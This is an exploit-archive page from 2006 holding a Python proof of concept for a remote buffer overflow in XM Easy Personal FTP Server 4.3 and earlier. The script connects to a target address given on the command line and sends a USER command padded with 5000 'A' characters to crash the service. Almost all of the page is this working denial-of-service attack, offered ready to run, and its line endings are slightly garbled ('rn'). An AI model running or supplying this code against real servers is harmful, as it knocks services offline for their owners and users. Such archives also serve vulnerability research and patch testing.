XM Easy Personal FTP Server <= 4.3 (USER) Remote Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XM Easy Personal FTP Server <= 4.3 (USER) Remote Buffer Overflow PoC
# Published : 2006-05-04
# Author : rewterz
# Previous Title : zawhttpd <= 0.8.23 (GET) Remote Buffer Overflow DoS
# Next Title : acFTP FTP Server <= 1.4 (USER) Remote Buffer Overflow PoC

##############################################################
# XM EASY PERSONAL FTP SERVER v4.3                           #  
# http://www.securityfocus.com/archive/1/432960/30/0/threaded# 
# Buffer Overflow Vulnerability PoC                          #  
# ahmed@rewterz.com                                          #
##############################################################

import socket
import struct
import time
import sys


buff='USER '+'A'*5000+'rn'

if len(sys.argv)!=3:
	print "[+] Usage: %s <ip> <port> n" %sys.argv[0]
	sys.exit(0)

try:
	
        print "[+] Connecting to %s" %sys.argv[1]
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect=s.connect((sys.argv[1],int(sys.argv[2])))
	print "[+] Sending Evil buffer"
	time.sleep(1)
	s.send(buff)
        print "[+] Service Crashed"
        s.recv(1024)
	
except:
	print "[+] Could Not Connect To ftp server"

# www.Syue.com [2006-05-04]